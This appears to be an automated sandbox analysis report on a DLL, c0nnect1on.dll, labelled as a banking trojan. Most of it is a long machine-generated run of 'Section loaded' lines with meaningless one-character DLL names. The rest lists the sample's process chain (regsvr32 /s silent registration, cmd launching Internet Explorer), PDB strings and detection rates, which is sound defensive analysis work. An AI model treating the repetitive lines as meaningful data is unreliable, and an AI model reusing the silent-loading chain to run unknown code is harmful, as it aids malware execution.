Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: @ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ? .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: > .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: = .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: < .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ; .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: : .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 9 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 8 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 7 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 6 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 5 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 4 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 3 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 2 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 1 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 0 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: - .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: , .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: + .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: * .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ) .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ( .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: & .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: % .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: $ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: # .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ! .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ~ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: } .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \| .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: { .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ` .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: _ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ^ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ] .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: [ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior

Source: classification engine

Classification label: mal80.bank.troj.winDLL@13/133@10/4

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00D95946 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

1_2_00D95946

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{DCB21009-2DB5-11EB-90E5-ECF4BB2D2496}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF1C1664AB589E59B3.TMP

Jump to behavior

Source: c0nnect1on.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: c0nnect1on.dll	Virustotal: Detection: 20%
Source: c0nnect1on.dll	ReversingLabs: Detection: 10%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\c0nnect1on.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\c0nnect1on.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4588 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4588 CREDAT:82952 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4588 CREDAT:82956 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\c0nnect1on.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4588 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4588 CREDAT:82952 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4588 CREDAT:82956 /prefetch:2	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: c0nnect1on.dll

Static PE information: More than 129 > 100 exports found

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: c0nnect1on.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: G:\predynastic\limacon\derivational\trull\avodire\sensatory\solaneine.pdb source: c0nnect1on.dll
Source:	Binary string: C:\saracenical\spokester\adynamic\unisotropic.pdb source: c0nnect1on.dll
Source:	Binary string: X:\unogled\counteradvance\awmous.pdb source: c0nnect1on.dll
Source:	Binary string: E:\foreshow\unplanished\ridgebone\hemihedrally\glycolic\racegoing\acromiohumeral.pdb source: c0nnect1on.dll
Source:	Binary string: N:\pasquil\leucocytopenia\polycladine\serpolet\nonheading\albarello\lissom.pdb3720 source: c0nnect1on.dll
Source:	Binary string: SQ:\complexionless\unobedient\intoxication\anglist.pdb source: c0nnect1on.dll
Source:	Binary string: SQ:\complexionless\unobedient\intoxication\anglist.pdbC source: c0nnect1on.dll
Source:	Binary string: N:\pasquil\leucocytopenia\polycladine\serpolet\nonheading\albarello\lissom.pdb source: c0nnect1on.dll

Source: c0nnect1on.dll

Static PE information: real checksum: 0x3e367 should be: 0x40075

Source: c0nnect1on.dll	Static PE information: section name: .s
Source: c0nnect1on.dll	Static PE information: section name: .ped
Source: c0nnect1on.dll	Static PE information: section name: .bu
Source: c0nnect1on.dll	Static PE information: section name: .bigg

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\c0nnect1on.dll

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_005121C3 push ecx; ret	1_2_005121D3
